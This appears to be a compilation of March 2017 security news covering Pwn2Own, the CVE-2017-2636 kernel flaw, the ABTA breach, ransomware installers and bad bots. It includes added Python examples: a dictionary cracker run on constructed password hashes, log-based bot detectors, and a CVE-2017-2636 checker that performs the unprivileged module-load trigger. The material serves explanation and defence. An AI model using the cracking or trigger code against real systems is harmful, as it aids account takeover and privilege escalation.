Mid-morning, researchers Samuel Groß (@5aelo) and Niklas Baumstark (@_niklasb) partially hacked Apple Safari with an escalation to root on macOS. The duo used a use-after-free (UAF) in Safari combined with three logic bugs and a null pointer dereference to exploit Safari and elevate to root on macOS. They were awarded style points for displaying a special message on the targeted Mac’s Touch Bar; they earned $28,000 USD and 9 Master of Pwn points.



Niklas Baumstark (@_niklasb), 8:06 PM - 15 Mar 2017: “First team to pwn Safari on macOS with escalation to root at #pwn2own! Was a ton of fun to pull that off with @5aelo”
In the afternoon, the Chaitin Security Research Lab (@ChaitinTech) hacked Ubuntu Desktop by exploiting a Linux kernel heap out-of-bounds access; they earned $15,000 and 3 Master of Pwn points. This is the first time Ubuntu Linux has been hacked at Pwn2Own.

The same group achieved another success at the end of the day, hacking Apple Safari with an escalation to root on macOS.
The attack chained a total of six bugs, including an info disclosure in Safari, four different type confusion bugs in the browser, and a UAF in WindowServer. The team earned $35,000 and 11 points towards Master of Pwn.

The highest reward, $80,000, went to Tencent Security’s Team Ether for hacking Microsoft’s Edge browser, leveraging an arbitrary write bug in Chakra and a logic bug to escape the sandbox. The team earned $80,000 and 10 points towards Master of Pwn.

Of course, there were also some failed attempts at Pwn2Own 2017: Tencent Security’s Team Sniper (Keen Lab and PC Mgr), who targeted Google Chrome with a SYSTEM-level escalation, were not able to complete their exploit chain within the allotted time.

The researcher Richard Zhu (fluorescence), targeting Apple Safari with an escalation to root on macOS, did not complete the exploit chain within the allotted time either.

Team Ether had signed up to hack Windows as well, but they withdrew the entry, as did the researcher Ralf-Philipp Weinmann, who had entered an Edge hack.


CVE-2017-2636 Linux kernel flaw was spotted after seven years and quickly fixed
17.3.2017 securityaffairs Vulnerability

A flaw recently fixed in the Linux kernel tracked as CVE-2017-2636 might have been exploited to gain privilege escalation or cause a DoS condition.
The security expert Alexander Popov from Positive Technologies has discovered a race condition in the n_hdlc driver that might be exploited by attackers for privilege escalation in the operating system.


The vulnerability, tracked as CVE-2017-2636, received a CVSS v3 score of 7.8; it went unnoticed for seven years, but it is not possible to say whether hackers have exploited it in the wild.

“This is an announcement of CVE-2017-2636, which is a race condition in the n_hdlc Linux kernel driver (drivers/tty/n_hdlc.c). It can be exploited to gain a local privilege escalation.” reads the security advisory published on SecList. “This driver provides HDLC serial line discipline and comes as a kernel module in many Linux distributions, which have CONFIG_N_HDLC=m in the kernel config. Exploiting the flaw in the vulnerable module n_hdlc does not require Microgate or SyncLink hardware. The module is automatically loaded if an unprivileged user opens a pseudoterminal and calls TIOCSETD ioctl for it setting N_HDLC line discipline.”

Attackers can cause the flawed module to be loaded automatically with just unprivileged user rights and without any special hardware.

The CVE-2017-2636 vulnerability affects the majority of popular Linux distributions including Ubuntu, RHEL 6/7, Fedora, SUSE, and Debian.

Linux users should install the latest security updates or, until they can, manually prevent the vulnerable module from being loaded.

Popov explained that, because of its age, the vulnerability is widespread across Linux systems.

According to the expert, the vulnerability was introduced on June 22, 2009. It was spotted years later during system call testing with the syzkaller fuzzer and was reported to kernel.org together with a patch and a PoC exploit.

The flaw was publicly disclosed on March 7, and the teams behind the major distributions quickly released security updates.


Travel Agent Association Breach Highlights Supply Chain Threat

16.3.2017 securityweek Incident

The Association of British Travel Agents (ABTA) today informed users of a breach that may have affected up to 43,000 customers.

In a statement, CEO Mark Tanzer explained that he "recently became aware of unauthorized access to the web server supporting abta.com by an external infiltrator exploiting a vulnerability." That would seem to rule out insider action -- the web server was hacked.

The incident apparently occurred on Feb. 27 on a web server "managed for ABTA through a third-party web developer and hosting company." This phrase is repeated three times throughout the statement as if trying to reassure customers that it was not ABTA's 'fault'. Legally, that doesn't work. ABTA is clearly the data controller in this instance, and the data controller retains responsibility regardless of any third-party data processor (that is, the web-hosting company). If any subsequent investigation finds lack of regulatory compliance contributing to this breach, it is ABTA that will be held liable.

This highlights a major problem for all businesses: how to adequately audit the security of the supply chain.

"As this breach highlights," comments Ross Brewer, VP and EMEA MD of LogRhythm, "companies need to be conscious of third parties they work with as they can end up being a chink in their armor that they aren't aware of. Unfortunately, it's not uncommon for suppliers or partners to fall short in terms of security, jeopardizing the security of large organizations like ABTA."

Tony Pepper, co-founder and CEO of Egress, makes the same point. "It's one thing to be confident that you're ticking all the right boxes, but it's another to assume that other businesses are being just as thorough." It is, adds Dave Hartley, Associate Director at MWR InfoSecurity, "a powerful example of the dangers of divesting security responsibilities to third party developers and hosting providers." You can divest responsibility, but you cannot easily divest liability.

ABTA has reported the incident to the UK's data protection regulator, the Information Commissioner's Office (ICO), and to the police. It will be some time before the ICO makes any compliance decision.

In the meantime, ABTA is playing down the severity of the incident.

"The majority of the data," says the statement, "related to email addresses and passwords for any ABTA Member or customer of an ABTA Member that had registered on abta.com. These passwords were encrypted – which means to the human eye it will look like a jumble of characters -- and so there is a very low exposure risk of identity theft or online fraud."

The key phrase here is 'these passwords were encrypted'. But the statement does not say whether they were encrypted or hashed, which hash algorithm was used, or whether the hashes were salted. All of these details determine how easily the passwords can be recovered: an unsalted fast hash such as MD5 or SHA-1 can be cracked in bulk at negligible cost, whereas a per-user salt and a deliberately slow scheme such as bcrypt, scrypt or PBKDF2 make every guess against every user expensive. Without those details, "encrypted" may simply mean "too easily recovered".

"Encryption will hardly make a difference to the incident," warns Ilia Kolochenko, CEO of High-Tech Bridge. "Hashed passwords can be quite easily bruteforced, and taking into consideration modern computing capacities, including elastic cloud infrastructure, attackers will probably get the majority of passwords in plaintext without much effort."

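To make the difference concrete, the added example below (not code from the article or from ABTA) simulates what a cracker does with a leaked table. The user records and the wordlist are constructed. With an unsalted fast hash every candidate password is hashed once and looked up against all users at the same time, and two users who chose the same password share the same hash. With a per-user random salt and a slow derivation (PBKDF2-HMAC-SHA256 is used here as the example of a slow scheme) every user/candidate pair costs a separate derivation of `rounds` iterations, so the work grows with the number of users and cannot be precomputed.

```python
"""Why 'the passwords were encrypted' says little: unsalted fast hash vs salted slow KDF.
Added example; the users and wordlist are constructed, not breach data."""
import hashlib
import os
from typing import Dict, List, Tuple

# Constructed wordlist and user records (two users share a password, one is not in the list).
WORDLIST: List[str] = ["password", "123456", "letmein", "qwerty", "travel2017", "holiday!", "abta"]
USERS: List[Tuple[str, str]] = [
    ("alice", "travel2017"),
    ("bob", "holiday!"),
    ("carol", "travel2017"),                    # same password as alice
    ("dave", "correct horse battery staple"),   # not in the wordlist
]


def md5_unsalted(password: str) -> str:
    """The weak scheme: one fast hash, no salt (often what 'encrypted' turns out to mean)."""
    return hashlib.md5(password.encode()).hexdigest()


def pbkdf2_salted(password: str, salt: bytes, rounds: int) -> bytes:
    """A sane scheme: per-user random salt plus a deliberately slow key derivation."""
    return hashlib.pbkdf2_hmac("sha256", password.encode(), salt, rounds)


def build_unsalted_dump() -> List[Tuple[str, str]]:
    """What a site storing unsalted MD5 would leak: (user, hex digest)."""
    return [(user, md5_unsalted(pw)) for user, pw in USERS]


def build_salted_dump(rounds: int) -> List[Tuple[str, bytes, bytes]]:
    """What a site storing salted PBKDF2 would leak: (user, salt, digest)."""
    dump = []
    for user, pw in USERS:
        salt = os.urandom(16)
        dump.append((user, salt, pbkdf2_salted(pw, salt, rounds)))
    return dump


def crack_unsalted(dump: List[Tuple[str, str]], wordlist: List[str]) -> Tuple[Dict[str, str], int]:
    """Hash each candidate once, then look every leaked digest up in that table.
    Cost: len(wordlist) hash computations, independent of the number of users."""
    table = {md5_unsalted(w): w for w in wordlist}        # a tiny rainbow table
    cracked = {user: table[digest] for user, digest in dump if digest in table}
    return cracked, len(wordlist)


def crack_salted(dump: List[Tuple[str, bytes, bytes]], wordlist: List[str],
                 rounds: int) -> Tuple[Dict[str, str], int]:
    """Every (user, candidate) pair needs its own slow derivation, because the salt differs per user.
    Cost: up to users * len(wordlist) derivations of `rounds` iterations each."""
    cracked: Dict[str, str] = {}
    derivations = 0
    for user, salt, digest in dump:
        for w in wordlist:
            derivations += 1
            if pbkdf2_salted(w, salt, rounds) == digest:
                cracked[user] = w
                break
    return cracked, derivations


if __name__ == "__main__":
    weak, n = crack_unsalted(build_unsalted_dump(), WORDLIST)
    print(f"unsalted MD5: cracked {weak} with {n} hash computations in total")
    strong, m = crack_salted(build_salted_dump(100_000), WORDLIST, 100_000)
    print(f"salted PBKDF2: cracked {strong} with {m} derivations of 100000 rounds each")
```

Both schemes give up the weak passwords to a dictionary attack; the difference is that the salted, slow scheme turns seven hash computations into dozens of expensive derivations per user and removes the shortcut of recognising shared passwords from identical digests. That is why "encrypted" without the algorithm and salting details does not support the claim of a "very low exposure risk".
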
The statement also says, "We are not aware of any information being shared beyond the infiltrator." This is another phrase designed to be reassuring but is ultimately meaningless unless the infiltrator is already known and apprehended (which of course is entirely possible). If this was a remote hack, then there is simply no way of knowing what the hacker may have done with the information.

This is particularly relevant to a part of the stolen data. Potentially accessed data includes a "smaller volume of data uploaded via the website by ABTA Members using the 'self-service' facility on abta.com, where ABTA Members have uploaded documentation in support of their membership." We don't know what members may have included in the uploaded supporting documentation, but it is likely to include names, addresses, phone numbers and so on in free text.

While ABTA says the passwords were encrypted, it does not say the documents were encrypted. This data is valuable to identity thieves, and victim members of ABTA will need to monitor their bank accounts and credit scores for years to come. Cyber criminals are well-known to be patient in their use of personal information for criminal purposes. As the ABTA statement says, victims "should remain vigilant regarding online and identity fraud: actively monitor your bank accounts and any social media and email accounts you may have."

In the meantime, victims should immediately change their ABTA password, and change any identical or even similar password used on any other account, to something strong and unique. Organizations, however, urgently need to find some way to audit the security of their supply chain; a necessity that will only become more important as the EU's General Data Protection Regulation comes into force.

Roughly a year ago, Google open-sourced its Vendor Security Assessment Questionnaire (VSAQ) framework to help companies improve their security programs. While not an official product of the search giant, the interactive questionnaire application was developed to support security reviews of vendors by facilitating the collection of information and letting users display it in template form.


Attackers Use New NSIS Installers to Hide Ransomware

16.3.2017 securityweek Virus

Newly observed ransomware campaigns are leveraging installer files from the Nullsoft Scriptable Install System (NSIS) to hide malicious code, Microsoft says.

The NSIS installers were recently associated with various well-known ransomware families, including Cerber, Locky, Teerac (also known as Crypt0L0cker), Crowti (aka CryptoWall), Wadhrama, and Critroni (aka CTB-Locker).

The new NSIS installers attempt to evade anti-virus detection by looking as normal as possible, which they do by incorporating non-malicious components: additional benign plugins alongside the installation engine system.dll, a .bmp file used as the background image for the installer interface, and a benign uninstaller component, uninst.exe.

Unlike previously used NSIS installers, the new ones no longer feature the randomly named DLL file that was used to decrypt the encrypted malware. Because of this major change, the footprint of malicious code in the NSIS installer package is significantly reduced, Microsoft reveals.

Starting last month, Microsoft observed an uptick in the adoption of the new installers that install ransomware. Instead of using a DLL file to decrypt the malicious payload, the new installers pack a Nullsoft installation script that loads the encrypted data file in memory and executes its code area.

Not only is the malicious payload encrypted, but the installation script is also obfuscated. The script loads the encrypted data file into memory, then gets the offset to the code area (12137). Next, the script issues a call to the encrypted data file. According to Microsoft, the code area in the encrypted data file is the first decryption layer, but the script further decrypts the code until it runs the final payload.

“By constantly updating the contents and function of the installer package, the cybercriminals are hoping to penetrate more computers and install malware by evading antivirus solutions. Given the pervasiveness of NSIS installers that distribute ransomware, they are likely part of a distribution network used by attackers to install their malware,” Andrea Lelli, Microsoft Malware Protection Center, notes.

The distribution campaigns leveraging the new NSIS installers usually follow a specific scheme, Microsoft explains: spam emails that mimic invoice delivery notifications deliver a malicious attachment, which could be a JavaScript downloader, a JavaScript downloader in a .zip file, a .LNK file that contains a PowerShell script, or a document with malicious macros. When the intended victim opens the attachment, the NSIS installer is downloaded, which in turn decrypts and runs the malware.

“Cybercriminals will stop at nothing to attempt sidestepping security solutions in order to install malware on your computer. The fact that we’re seeing these innovations in cybercriminal operations that deliver ransomware reveals that they are highly motivated to achieve their ultimate goal: to siphon money off their victims. Unfortunately, for enterprises, the damage of successful malware infection can be so much more than just cash,” Lelli says.


Another Old Flaw Patched in Linux Kernel

16.3.2017 securityweek Vulnerability
A researcher has identified another potentially serious Linux kernel vulnerability that has been around for several years. The flaw was addressed in the kernel more than one week ago, but some of the affected Linux distributions have yet to release patches.

The security hole was discovered using the syzkaller fuzzer by Positive Technologies expert Alexander Popov, who reported it to Linux kernel developers on February 28. The researcher said the vulnerability was introduced in June 2009.

The flaw, tracked as CVE-2017-2636, is a race condition in the n_hdlc driver that can lead to a double-free error. A local attacker with limited privileges can exploit the weakness to cause a denial-of-service (DoS) condition or escalate privileges.

"The vulnerability is old, so it is widespread across Linux workstations and servers,” explained Popov. “To automatically load the flawed module, an attacker needs only unprivileged user rights. Additionally, the exploit doesn't require any special hardware.”

The security hole affects Red Hat, Ubuntu, Debian, SUSE and other distributions, but patches have not been made available for all affected versions. The bug was patched in the Linux kernel on March 7.

Until fixes become available, users can mitigate the vulnerability by manually blocking the affected module from loading. Popov says he plans on releasing a proof-of-concept (PoC) exploit once users have had the chance to update their installations.

Several of the Linux kernel flaws identified in the past months had been introduced years prior to their discovery, including CVE-2016-0728 and CVE-2016-5696, both introduced in 2012 and both affecting Linux and Android devices. An even older vulnerability, CVE-2017-6074, which came to light last month, was introduced in 2005.

Researcher Kees Cook recently analyzed the Linux kernel vulnerabilities discovered since 2011 in an effort to determine for how long they had gone unnoticed. The expert determined that the average lifespan of a security hole is roughly 5 years, with critical issues being discovered after 3.3 years and high severity bugs found after more than 6 years.


Advanced Persistent "Bad Bots" are Rampant

16.3.2017 securityweek BotNet
In 2016, 40% of all web traffic originated from bots -- and half of that came from bad bots. A bot is simply a software application that runs automated tasks over the internet. Good bots are beneficial. They index web pages for the search engines, can be used to monitor web site health and can perform vulnerability scanning. Bad bots do bad things: they are used for content scraping, comment spamming, click fraud, DDoS attacks and more. And they are everywhere.

Findings from Distil's 2017 Bad Bot Report (PDF) released Thursday show that the problem is rising again after a brief improvement in 2015. In 2015 bad bots represented 18.61% of all web traffic. This is down from 22.78% in 2014, but has risen to 19.90% in 2016. These figures come from an analysis of hundreds of billions of bad bot requests, anonymized over thousands of domains.

Bad Bot Report

Bad bots especially target websites with proprietary content and/or pricing information, a login section, web forms, and payment processing. Ninety-seven percent of websites with proprietary content and/or pricing were hit by unwanted scraping; 90% of websites with a login page were hit by bad bots behind the login in 2016; and 31% of websites with forms were hit by spam bots.

Sophisticated bots, which Distil describes as "advanced persistent bots" or APBs, can load JavaScript, hold onto cookies, and load external resources. They are persistent, and can even randomize their IP address, headers, and user agents. In 2016, 75% of bad bots were advanced persistent bots, Distil says.

Bots attack the application layer, so the traditional defense has always been the web application firewall (WAF). It's a good start, says Distil, but not enough. WAFs are good at blocking bad IPs, and can geo-block whole regions. While this could block, for example, China and Russia (if the site in question doesn't do business with China and Russia), more than 55% of all bot traffic originates from within the US.

This doesn't mean that the bot operators are mostly American citizens. "Unlike the criminals of yesteryear who needed to be physically present to commit crimes, cyber thieves have technology to do their bidding for them. Sure, a spammer bot might originate from the Microsoft Azure Cloud, but the perpetrator responsible for it could be located anywhere in the world."

While blocking entire countries (Russia and China, for example) may be a feasible defense, bot origination from friendly nations such as the Netherlands (11.4%) is almost twice that of China (6.1%). Blocking individual known bad IPs is also problematic. "Bad bots rotate through IPs, and cycle through user agents to evade these WAF filters," warns Distil.

"You'll need a way to differentiate humans from bad bots using headless browsers, browser automation tools, and man-in-the-browser malware," it adds. "52.05% percent of bad bots load and execute JavaScript -- meaning they have a JavaScript engine installed."

The failure of WAFs to adequately block bad bots has contributed to the increase in application-layer DDoS attacks. Volumetric DDoS (itself a rapidly growing problem as botnets harness the power of the internet of things) simply floods the website until further access is impossible. However, that is a layer 3 attack that can be readily spotted and, with sufficient planning, mitigated.

"In contrast," notes Distil, "an application denial of service event occurs when bots programmatically abuse the business logic of your website. This happens at layer seven, so you won't notice it on your firewall and your load balancer will be just fine. It's the web application and backend that keels over."

A simple example of this type of attack is found in WordPress websites. A bot adds 'web-admin.php' (it could be anything that waits for further user input) to a legitimate page URL, and then sends repeated access requests while cycling through multiple IPs. This rapidly leads to the consumption of all available channels -- and the site is effectively down.

The threat from bad bots should not be underestimated -- their nuisance value alone can cause problems. Content scraping and reposting elsewhere will lower search engine scores and affect good traffic. They can skew traffic analytics, providing web analytics with false information and potentially leading to false assumptions and misguided future planning.

But many bots have malicious intent from the beginning -- for example, bad bots are one of the primary methods of testing stolen credentials. "In 2016," says the report, "95.8% of websites fell prey to account credential bots on their login page. In other words, if you sample any group of 100 websites that contain a login page, 96 of them will have been attacked in this manner... With billions of stolen login credentials available on the dark web, bad bots are busy testing them against websites all over the globe."
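
The traits described above, IP and user-agent rotation behind one session, the web-admin.php flood, and credential testing against the login page, all leave traces in ordinary access logs. The following Python script is an added example, not Distil's product or code: it parses a constructed log format (an assumption, spelled out in the regex) over a handful of constructed sample lines and runs one detector per pattern. The thresholds are illustrative and would be tuned per site.

```python
"""Bad-bot detection over web-server access logs: credential stuffing, session/IP/UA
rotation, and layer-7 floods. Added example with constructed log lines; not Distil's code."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from typing import List, Set

# Assumed log format for this example:
#   ip [ISO timestamp] "METHOD path HTTP/x" status "user-agent" sid=<session> [user=<login attempted>]
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) HTTP/[\d.]+" '
    r'(?P<status>\d{3}) "(?P<ua>[^"]*)" sid=(?P<sid>\S+)(?: user=(?P<user>\S+))?$'
)

# Constructed sample: one IP testing five usernames in four seconds, a human retrying
# one login, and a bot replaying one session cookie from four IPs with four user agents.
SAMPLE_LOG = """\
203.0.113.10 [2017-03-16T10:00:01] "POST /login HTTP/1.1" 401 "Mozilla/5.0 (Windows NT 10.0) Chrome/56.0" sid=s1 user=alice
203.0.113.10 [2017-03-16T10:00:02] "POST /login HTTP/1.1" 401 "Mozilla/5.0 (Windows NT 10.0) Chrome/56.0" sid=s1 user=bob
203.0.113.10 [2017-03-16T10:00:03] "POST /login HTTP/1.1" 401 "Mozilla/5.0 (Windows NT 10.0) Chrome/56.0" sid=s1 user=carol
203.0.113.10 [2017-03-16T10:00:04] "POST /login HTTP/1.1" 401 "Mozilla/5.0 (Windows NT 10.0) Chrome/56.0" sid=s1 user=dave
203.0.113.10 [2017-03-16T10:00:05] "POST /login HTTP/1.1" 200 "Mozilla/5.0 (Windows NT 10.0) Chrome/56.0" sid=s1 user=erin
198.51.100.7 [2017-03-16T10:01:00] "POST /login HTTP/1.1" 401 "Mozilla/5.0 (Macintosh) Safari/602.1" sid=s2 user=frank
198.51.100.7 [2017-03-16T10:01:20] "POST /login HTTP/1.1" 200 "Mozilla/5.0 (Macintosh) Safari/602.1" sid=s2 user=frank
192.0.2.21 [2017-03-16T10:02:00] "GET /blog/2017/03/post/web-admin.php HTTP/1.1" 404 "curl/7.52.1" sid=s-bot
192.0.2.22 [2017-03-16T10:02:00] "GET /blog/2017/03/post/web-admin.php HTTP/1.1" 404 "python-requests/2.13" sid=s-bot
192.0.2.23 [2017-03-16T10:02:01] "GET /blog/2017/03/post/web-admin.php HTTP/1.1" 404 "Mozilla/5.0 (X11; Linux) Firefox/52.0" sid=s-bot
192.0.2.24 [2017-03-16T10:02:01] "GET /blog/2017/03/post/web-admin.php HTTP/1.1" 404 "Mozilla/5.0 (Windows NT 6.1) Chrome/41.0" sid=s-bot
198.51.100.7 [2017-03-16T10:03:00] "GET /blog/2017/03/post/ HTTP/1.1" 200 "Mozilla/5.0 (Macintosh) Safari/602.1" sid=s2 user=frank
"""


def parse(log_text: str) -> List[dict]:
    """Parse log lines into dicts; lines that do not match are skipped, never trusted."""
    events = []
    for line in log_text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        e = m.groupdict()
        e["ts"] = datetime.fromisoformat(e["ts"])
        e["status"] = int(e["status"])
        events.append(e)
    return events


def _window_hit(items, window, predicate) -> bool:
    """Sliding window over (ts, value) pairs sorted by time; True if any window satisfies predicate."""
    items.sort()
    start = 0
    for end in range(len(items)):
        while items[end][0] - items[start][0] > window:
            start += 1
        if predicate(items[start:end + 1]):
            return True
    return False


def credential_stuffing(events, window=timedelta(seconds=60), min_users=5) -> Set[str]:
    """IPs that try at least min_users distinct usernames on the login form inside one window."""
    attempts = defaultdict(list)
    for e in events:
        if e["method"] == "POST" and e["path"] == "/login" and e["user"]:
            attempts[e["ip"]].append((e["ts"], e["user"]))
    return {ip for ip, tries in attempts.items()
            if _window_hit(tries, window, lambda span: len({u for _, u in span}) >= min_users)}


def rotating_sessions(events, max_distinct=2) -> Set[str]:
    """Session cookies replayed from more than max_distinct IPs or user agents: a human's browser
    does not change network and identity between requests, an APB rotating IPs and UAs does."""
    ips, uas = defaultdict(set), defaultdict(set)
    for e in events:
        ips[e["sid"]].add(e["ip"])
        uas[e["sid"]].add(e["ua"])
    return {sid for sid in ips if len(ips[sid]) > max_distinct or len(uas[sid]) > max_distinct}


def layer7_flood(events, window=timedelta(seconds=10), min_hits=4, min_ips=3) -> Set[str]:
    """Paths hammered by many distinct IPs in a short window (the web-admin.php pattern):
    cheap for the bot, but each hit forces a full application round-trip on the backend."""
    hits = defaultdict(list)
    for e in events:
        hits[e["path"]].append((e["ts"], e["ip"]))
    return {path for path, h in hits.items()
            if _window_hit(h, window, lambda span: len(span) >= min_hits
                           and len({ip for _, ip in span}) >= min_ips)}


if __name__ == "__main__":
    ev = parse(SAMPLE_LOG)
    print("credential stuffing from:", credential_stuffing(ev))
    print("rotating sessions:", rotating_sessions(ev))
    print("layer-7 flood on:", layer7_flood(ev))
```

None of the three detectors needs JavaScript challenges or client fingerprinting; they work on the server-side record alone, which is what a WAF that only blocks IPs and regions never looks at. The session detector is the one that catches "advanced persistent" behaviour: a bot that rotates IPs and user agents but keeps the cookie it was issued gives itself away by that very consistency.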

"Massive credential dumps like Ashley Madison and LinkedIn," says Rami Essaid, CEO and co-founder of Distil Networks, "coupled with the increasing sophistication of bad bots, has created a world where bad bots are running rampant on websites with accounts. Website defenders should be worried because once bad bots are behind the login page, they have access to even more sensitive data for scraping and greater opportunity to successfully carry out transaction fraud."

There is no easy solution to the threat from bad bots. Distil recommends several options, such as "geo-fence your website by blocking users from foreign nations where your company doesn't do business"; whitelist current or recent browser versions and block older versions from accessing the site; and consider "creating a whitelist policy for good bots and setting up filters to block all other bots -- doing so blocks up to 25% of bad bots."

Doing nothing is not a realistic option, because "you won't see the next bad bot attack coming even though it's all over your site."


Linux Kernel Gets Patch For Years-Old Serious Vulnerability
16.3.2017 thehackernews Vulnerability
Another dangerous vulnerability has been discovered in the Linux kernel that dates back to 2009 and affects a large number of Linux distros, including Red Hat, Debian, Fedora, OpenSUSE, and Ubuntu.
The latest Linux kernel flaw (CVE-2017-2636), which has existed in the Linux kernel for the past seven years, allows a local unprivileged user to gain root privileges on affected systems or cause a denial of service (system crash).
Positive Technologies researcher Alexander Popov discovered a race condition in the N_HDLC Linux kernel driver – which is responsible for handling High-Level Data Link Control (HDLC) data – that leads to a double-free vulnerability.
A "double free" is one of the most common memory corruption bugs: it occurs when a program releases the same memory location twice by calling free() on the same allocation.
A local, unprivileged attacker can leverage this vulnerability to corrupt kernel memory and execute arbitrary code in the kernel, thereby gaining root privileges.
The vulnerability affects the majority of popular Linux distributions including Red Hat Enterprise Linux 6, 7, Fedora, SUSE, Debian, and Ubuntu.
Since the flaw dates back to June 2009, Linux enterprise servers and devices have been vulnerable for a long time, but according to Positive Technologies, it is hard to say whether this vulnerability has actively been exploited in the wild or not.
"The vulnerability is old, so it is widespread across Linux workstations and servers," says Popov. "To automatically load the flawed module, an attacker needs only unprivileged user rights. Additionally, the exploit doesn't require any special hardware."
The researcher detected the vulnerability during system call testing with syzkaller, a coverage-guided kernel fuzzer developed by Google.
Popov then reported the flaw to kernel.org on February 28, 2017, along with the exploit prototype, as well as provided the patch to fix the issue.
The vulnerability has already been patched in the Linux kernel, and the security updates along with the vulnerability details were published on March 7.
Users are therefore encouraged to install the latest security updates as soon as possible; where the patch cannot be applied yet, the researcher advises manually blocking the flawed module (n_hdlc) from loading, on enterprise and home systems alike.
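
The three reports above on CVE-2017-2636 describe the same trigger (an unprivileged user opens a pseudoterminal and sets the N_HDLC line discipline with TIOCSETD, which makes the kernel auto-load the module) and the same stop-gap (keep the module from loading). The script below is an added example, not the Positive Technologies PoC, and it does not exercise the race itself. It checks /proc/modules-style text for the module, checks a modprobe.d file for the mitigation line, and on Linux performs the line-discipline switch on a fresh pty master to see whether the kernel still auto-loads n_hdlc. The `install n_hdlc /bin/true` line and the path /etc/modprobe.d/disable-n_hdlc.conf are assumptions; the `install` form is used because, unlike a bare `blacklist` line, it also defeats loading the module by name.

```python
"""CVE-2017-2636 checks: is n_hdlc resident, is the modprobe stop-gap in place, and does an
unprivileged TIOCSETD on a pty still auto-load the module?
Added example; not the Positive Technologies PoC and it does not trigger the race."""
import errno
import fcntl
import os
import struct
import termios

N_HDLC = 13                                             # line discipline number, <linux/tty.h>
MODULE = "n_hdlc"
ENOTTY = errno.ENOTTY
MODPROBE_CONF = "/etc/modprobe.d/disable-n_hdlc.conf"   # assumed path
MITIGATION = f"install {MODULE} /bin/true\n"              # assumed stop-gap line


def module_loaded(proc_modules_text: str) -> bool:
    """/proc/modules lists one module per line; the module name is the first field."""
    return any(line.split()[0] == MODULE
               for line in proc_modules_text.splitlines() if line.strip())


def mitigation_present(modprobe_conf_text: str) -> bool:
    """True if an 'install n_hdlc /bin/true' (or /bin/false) directive is present.
    'install' replaces the load command, so both alias-based request_module() from the
    kernel and an explicit 'modprobe n_hdlc' become no-ops; a bare 'blacklist' only
    stops alias resolution."""
    for raw in modprobe_conf_text.splitlines():
        fields = raw.split("#", 1)[0].split()           # strip comments
        if (len(fields) >= 3 and fields[0] == "install" and fields[1] == MODULE
                and fields[2] in ("/bin/true", "/bin/false")):
            return True
    return False


def try_set_ldisc(fd: int, ldisc: int = N_HDLC) -> int:
    """Issue TIOCSETD on fd; return 0 on success or the errno on failure.
    On a tty this is the advisory's unprivileged trigger: the kernel calls request_module()
    for the 'tty-ldisc-13' alias. With the install-line stop-gap the discipline is never
    registered and the ioctl fails with EINVAL."""
    try:
        fcntl.ioctl(fd, termios.TIOCSETD, struct.pack("i", ldisc))
        return 0
    except OSError as exc:
        return exc.errno


def ldisc_errno_on_non_tty() -> int:
    """Sanity check of the helper: a pipe is not a tty, so TIOCSETD must fail with ENOTTY."""
    r, w = os.pipe()
    try:
        return try_set_ldisc(r)
    finally:
        os.close(r)
        os.close(w)


def probe() -> dict:
    """Open a pty master (no Microgate/SyncLink hardware needed), attempt the switch,
    then report whether the module is now resident."""
    fd = os.posix_openpt(os.O_RDWR | os.O_NOCTTY)
    try:
        rc = try_set_ldisc(fd)
        with open("/proc/modules") as f:
            loaded = module_loaded(f.read())
    finally:
        os.close(fd)                                    # closing the pty drops the ldisc again
    return {"ioctl_errno": rc, "module_loaded": loaded}


if __name__ == "__main__":
    try:
        with open(MODPROBE_CONF) as f:
            mitigated = mitigation_present(f.read())
    except FileNotFoundError:
        mitigated = False
    result = probe()
    print(f"stop-gap line present in {MODPROBE_CONF}: {mitigated}")
    print(f"TIOCSETD(N_HDLC) on a pty -> {result['ioctl_errno']} "
          f"({errno.errorcode.get(result['ioctl_errno'], 'OK')})")
    print(f"{MODULE} resident after probe: {result['module_loaded']}")
    if result["ioctl_errno"] == 0 and not mitigated:
        print("n_hdlc can still be auto-loaded by an unprivileged user; patch, or add the stop-gap:")
        print(f"  echo '{MITIGATION.strip()}' > {MODPROBE_CONF}")
```

Run it as an unprivileged user before and after applying the update or the stop-gap: a return of 0 with the module resident means the trigger still works (the module may also be built in, in which case only the kernel update helps), while EINVAL after adding the `install` line shows the stop-gap is effective. Note that success here only means the module loads; the actual double-free needs the race that Popov's PoC exercises.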


Intel Offers Up to $30,000 for Hardware Vulnerabilities

16.3.2017 securityweek Vulnerability

Intel has launched its first bug bounty program and the tech giant is prepared to offer up to $30,000 for vulnerabilities found in its products.

The bug bounty program, hosted on the HackerOne platform, covers Intel’s software, firmware and hardware. It does not cover Intel Security (McAfee) products, the company’s web infrastructure, or acquisitions completed less than six months ago. Third-party and open source applications are also not in scope of the program.

Researchers who find critical hardware vulnerabilities can earn a maximum of $30,000. Critical flaws in Intel software and firmware are worth up to $7,500 and $10,000, respectively.

The severity of a vulnerability is determined based on its CVSS 3.0 base score, and adjusted depending on the affected product’s threat model and security objectives.

Intel bug bounty program payouts

“We want to encourage researchers to identify issues and bring them to us directly so that we can take prompt steps to evaluate and correct them, and we want to recognize researchers for the work that they put in when researching a vulnerability,” Intel said.

Following the recent Vault 7 leak by WikiLeaks, which describes the CIA’s alleged hacking capabilities, Intel announced the availability of a CHIPSEC framework module that can be used to verify the integrity of EFI firmware executables.

Microsoft launches new Office bug bounty program

Microsoft also made a bug bounty announcement on Wednesday. The company has launched a new program for Office Insider Builds on Windows.

This new bug bounty program, which runs between March 15 and June 15, promises payouts ranging from $6,000 to $15,000 for various types of vulnerabilities. Researchers can earn rewards if they find privilege escalation vulnerabilities via Office Protected View, flaws that allow macro execution by bypassing security policies, and code execution through a bypass of automatic attachment blocking policies in Outlook.

The announcement comes shortly after Microsoft decided to temporarily double bug bounty payouts for vulnerabilities found in core applications of the Office 365 suite.


Several Vulnerabilities Patched in Drupal 8

16.3.2017 securityweek Vulnerability

Several vulnerabilities have been patched in the Drupal content management system (CMS) with the release of version 8.2.7, including access bypass, cross-site request forgery (CSRF) and remote code execution flaws.

The most serious of them, rated critical and tracked as CVE-2017-6377, is an access bypass weakness affecting the editor module.

“When adding a private file via a configured text editor (like CKEditor), the editor will not correctly check access for the file being attached, resulting in an access bypass,” Drupal said in its security advisory.

